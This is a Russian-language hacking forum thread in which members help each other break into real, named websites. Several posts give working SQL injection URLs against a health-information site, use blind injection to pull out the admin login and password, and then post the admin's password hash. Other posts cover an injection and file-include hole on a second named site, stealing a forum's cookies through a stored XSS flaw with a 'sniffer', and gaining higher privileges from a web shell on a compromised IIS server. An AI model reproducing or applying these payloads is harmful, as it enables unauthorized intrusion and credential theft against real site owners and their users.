Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    вот, наткнулся на это
    Code:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2
    
    Unknown column 'Status' in 'field list'

    А если делать запросы следующих видов:

    Code:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2--
    
    Code:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1,2,3
    
    Code:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=-1+union+select+1
    
    Выдает:The used SELECT statements have a different number of columns


    Не первый раз такое встречается, кто-нить знает, как это раскрутить?
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    ПаВлУшКа,

    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+concat_ws(0x2F,username,password)+from+admin+limit+0,1),3,1))>1
     
  3. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    ElteRUS, это блинда чтоли? ТВой завпрос тоже ошибку выдает, как версию узнать для начала?
     
  4. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=4
    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+substring(version(),1,1)=5
    4
    А в его запросе-Просто пробелы убери.
     
  5. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Вытягивай имя:

    Code:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1
    5 Символов, скорей всего admin

    пасс:

    Code:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+password+from+admin+limit+0,1),32,1))%3E1
    32 симола - хэш
     
  6. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    ПаВлУшКа
    admin:3271d6889498c22a81b51aba93dc9307
     
  7. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    ph1l1ster, а как ты хеш узнал? Я правильно понял:
    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),5,1))%3E1

    Проверяет, если usermane содержит 5 и меньше символов, то выводится страница, а если больше, то ошибка??
     
  8. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    ПаВлУшКа
    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),1,1))=97
    первый символ ascii: 97 char: a

    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),2,1))=100
    второй символ ascii: 100 char:d

    http://www.fibromyalgiareveal.com/resources/browse.php?id=2+and+ascii(substring((select+username+from+admin+limit+0,1),3,1))=109
    третий символ ascii: 109 char: m

    и тд.
     
  9. HIVER

    HIVER Member

    Joined:
    28 Oct 2008
    Messages:
    36
    Likes Received:
    18
    Reputations:
    0
    _http://top.warlib.ru/index.php?cid=1'/*

    так же здесь есть инклуд:
    _http://www.warlib.ru/index.php?id[]=000117

    Раскручивание на замену нулл-байту ничего не дало, может у кого получится)
     
    #6069 HIVER, 23 Mar 2009
    Last edited: 23 Mar 2009
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://top.warlib.ru/index.php?cid=1+and+substring(version(),1,1)=5
    HIVER, пятая ветка.
     
  11. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    подскажите как действовать при имении веб шелла на win server, IIS, asp и php.
    есть ли хорошие веб шелы на asp (многофукциональный). есть ли возможность повысить права через asp скрипты? заранее благодарен
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    https://forum.antichat.ru/nextoldesttothread103565.html
    https://forum.antichat.net/nextoldesttothread93095.html
     
  13. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Такой вопрос:
    Значит нашол я посивную XSS на одном форуме с помощью вот этого скрипта: "><script>alert(1)</script>. Находится XSS в строке "Заголовок письма" (при написании письма другому пользователю). Ни как не могу въехать как дать жертве ссылку на эту строку, чтобы своровать КУКУ.
     
  14. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    составить Post Запрос с сылкой на сниф
     
  15. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    Т.е. процес тот же, что и с почтовыми сайтами ?
    Тут вопрос ещё в чём, я не пойму как дать ссылку не посредственно на эту XSS. Потому что когда я даю ссылку на ту страницу где находится форма письма, XSS так не прокатывает.
     
    #6075 Seshh, 23 Mar 2009
    Last edited: 23 Mar 2009
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если я не ошибаюсь, это активка.
     
  17. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Если я тебя правильно понял то уязвимый параметр Заголовок письма и это письмо отсылаеться другому пользователю с уже внедреным html тегом и у пользователя к которому пишешь вылетает алерт при чтении письма? То это активка, делай просто картинку на сниф с куками.
     
  18. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    он вроде писал при отправке письма.

    Seshh, при отправке или при получении?
     
    1 person likes this.
  19. Seshh

    Seshh New Member

    Joined:
    4 Mar 2009
    Messages:
    23
    Likes Received:
    0
    Reputations:
    0
    При отправке письма, если вносим скрипт в строку "Заголовок письма" и пытаемся отправить.
    Загвоздка заключается ещё в следующем, если я вношу скрипт в эту строку, а в строку "имя получателя" ввожу не правильное имя (т.е. имя которого нет на форуме) то скрипт выполняется. Если же имя правильное то скрипт не выполняется, а просто отправляется.
     
    #6079 Seshh, 24 Mar 2009
    Last edited: 24 Mar 2009
  20. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    123
    Likes Received:
    6
    Reputations:
    6
    помогите повысить права на win server.

    Microsoft-IIS/6.0 servet

    имеется вебшелл - asp
    cmd команды выполнять не могу

    могу запускать php asp perl скрипты. может есть в самом php уязвимости если он на винде, либо asp. какие есть варианты?
    подскажите где можно почитать когда такая ситуация. спс
     
Thread Status:
Not open for further replies.